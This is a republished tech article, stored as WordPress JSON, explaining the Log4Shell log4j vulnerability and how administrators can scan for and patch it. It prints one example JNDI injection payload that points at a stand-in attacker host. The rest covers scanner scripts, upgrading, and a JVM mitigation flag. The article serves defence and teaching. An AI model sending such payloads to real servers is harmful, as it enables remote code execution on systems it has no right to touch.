{"id":382667,"date":"2021-12-18T03:02:54","date_gmt":"2021-12-18T00:02:54","guid":{"rendered":"https:\/\/en.buradabiliyorum.com\/how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell-cloudsavvy-it\/"},"modified":"2021-12-18T03:02:54","modified_gmt":"2021-12-18T00:02:54","slug":"how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell-cloudsavvy-it","status":"publish","type":"post","link":"https:\/\/buradabiliyorum.com\/en\/how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell-cloudsavvy-it\/","title":{"rendered":"#How to Check If Your Server Is Vulnerable to the log4j Java Exploit (Log4Shell) \u2013 CloudSavvy IT"},"content":{"rendered":"<p><strong>&#8220;#How to Check If Your Server Is Vulnerable to the log4j Java Exploit (Log4Shell) \u2013 CloudSavvy IT&#8221;<\/strong><\/p>\n<div id=\"article-content-area\">\n<p>A critical exploit in a widespread Java library has been found, disrupting much of the internet as server admins scramble to fix it. The vulnerable component, <code>log4j<\/code>, is used everywhere as an included library, so you will need to check your servers and make sure they\u2019re updated.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"How_Does_This_Exploit_Work\"><\/span>How Does This Exploit Work?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>As far as exploits go, the <code>log4j<\/code> vulnerability is by far one of the worst in the last few years, scoring a rare 10\/10 on the CVSS scale, and is going to haunt the entire internet for many years to come.<\/p>\n<p>What\u2019s worse is that <code>log4j<\/code> isn\u2019t an application\u2014it\u2019s an open source library used by many other applications. You may not have it installed directly; it might be included in other <code>.jar<\/code> files, or installed by other applications as a dependency.<\/p>\n<p>Essentially, it allows attackers to send text to your application, and if it logs it somewhere (e.g., logging a user-controlled User-Agent string in a web server), your server will execute malicious code.
The format of the text looks like the following example: an extremely simple string containing a link to a remote address.<\/p>\n<pre>${jndi:ldap:\/\/attacker.com\/a}<\/pre>\n<p>The vulnerable component in <code>log4j<\/code> is the <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.blackhat.com\/docs\/us-16\/materials\/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf\">Java Naming and Directory Interface<\/a>, which allows the logging framework to make remote requests. The problem is that it also deserializes whatever that endpoint returns, and is able to load <code>.class<\/code> files containing remote code. Which is bad.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"Am_I_Vulnerable\"><\/span>Am I Vulnerable?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The exploit was quickly patched in <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/apache\/logging-log4j2\/releases\/tag\/log4j-2.15.0-rc2\"><code>log4j<\/code>\u2019s latest release, 2.16.0<\/a>, but the problem isn\u2019t fixing it\u2014it\u2019s finding out where you need to. Since <code>log4j<\/code> is an embedded dependency, it may be non-trivial to search for the specific version of it on your system. And, since Java is so popular, many third-party tools and components may use it, so you may not even <em>know<\/em> if you are running Java software on your machines.<\/p>\n<p><strong>Even if you think you aren\u2019t vulnerable, you probably still need to double-check<\/strong>. This exploit affects so many systems that there is a solid chance you may be running <code>log4j<\/code> or Java without realizing it.<\/p>\n<p>Luckily, JDK versions greater than <code>6u211<\/code>, <code>7u201<\/code>, <code>8u191<\/code>, and <code>11.0.1<\/code> are not affected by the primary attack vector (using LDAP) that\u2019s being exploited the most right now.
You still need to patch it regardless, since it can\u00a0easily be <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.veracode.com\/blog\/research\/exploiting-jndi-injections-java\">used with other attack vectors as well<\/a>. Also, just the simple act of making a request to an endpoint can reveal data about machines on your network, which isn\u2019t a good thing either.<\/p>\n<p>This exploit highlights why it is important to keep a Software Bill of Materials (SBOM), basically a list of all the software on your systems, where it comes from, and what it\u2019s made from. In the future, this knowledge can help you quickly patch against attacks like this.<\/p>\n<p>In the present, you are probably just concerned about getting your network patched. To do that, you\u2019ll need to scan your systems to find <code>log4j<\/code>\u00a0versions used by your software, and make a list of all the vulnerable components.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"Scanning_Your_System\"><\/span>Scanning Your System<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Many people have already made scripts to automatically scan systems for vulnerable installations, such as <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/fullhunt\/log4j-scan\">this popular one written in Python<\/a>, and <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day-mitigation-guide\/\">this one from security firm LunaSec<\/a>. One of the easiest to use <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/rubo77\/log4j_checker_beta\">is this simple bash script<\/a>, which can scan your packages and identify <code>log4j<\/code>\u00a0versions, and can also tell you if your system is even using Java in the first place. 
In most cases, you\u2019ll want to run multiple scans with different scripts, because it\u2019s not guaranteed that any one of these is going to be 100% effective at identifying every vulnerable system.<\/p>\n<p>You can download the bash script and run it with a few commands. It needs to run as root to scan your whole system, so of course, be careful which scripts you run with root privileges off the internet. This too is arbitrary code execution.<\/p>\n<pre>wget https:\/\/raw.githubusercontent.com\/rubo77\/log4j_checker_beta\/main\/log4j_checker_beta.sh -q\nchmod +x log4j_checker_beta.sh\nsudo .\/log4j_checker_beta.sh<\/pre>\n<p>The results from this script highlight exactly what makes this <code>log4j<\/code> vulnerability so terrible\u2014running this on my personal server revealed that I was vulnerable to the exploit, days after the zero-day, despite thinking I did not have Java installed on this machine because I\u2019m not running any of my own Java software.<\/p>\n<p>Elasticsearch, which is written in Java, is running in the background on this machine. I didn\u2019t have to install Java manually to install Elasticsearch; it includes a bundled version of OpenJDK. It includes <code>log4j<\/code> in this installation and is vulnerable to the exploit.<\/p>\n<p>The fix, for Elasticsearch at least, is updating all packages and following their mitigation guides.
This will likely be the case for whatever software you\u2019re running; you\u2019ll need to update <code>log4j<\/code> directly, update the software bundling it, or hotfix it with whatever best practice mitigations other people are using.<\/p>\n<p>If you can\u2019t patch the jar for some reason, you can use this JVM flag to mitigate the issue, which simply tells <code>log4j<\/code> to never do any lookups when formatting messages (the property only exists in <code>log4j<\/code> 2.10 and later, so it does nothing for older versions). This isn\u2019t recommended though, and you should try to get <code>log4j<\/code> 2.16.0 installed wherever you can to fix the problem entirely.<\/p>\n<pre>-Dlog4j2.formatMsgNoLookups=true<\/pre>\n<\/div>\n<p><span style=\"color: black;\"><a style=\"color: #ff9900;\" href=\"https:\/\/www.cloudsavvyit.com\/15139\/how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell\/\" target=\"_blank\" 
rel=\"noopener\">Source<\/a><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;#How to Check If Your Server Is Vulnerable to the log4j Java Exploit (Log4Shell) \u2013 CloudSavvy IT&#8221; A critical exploit in a widespread Java library has been found, disrupting much of the internet as server admins scramble to fix it. The vulnerable component, log4j, is used everywhere as an included library, so you will need to&#8230;<\/p>\n","protected":false},"author":1,"featured_media":382668,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png","fifu_image_alt":"","footnotes":""},"categories":[18],"tags":[],"class_list":["post-382667","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technology"],"_links":{"self":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts\/382667","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/comments?post=382667"}],"version-history":[{"count":0,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts\/382667\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/media\/382668"}],"wp:attachment":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/media?parent=382667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/categories?post=382667"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/tags?post=382667"}],"curie
s":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}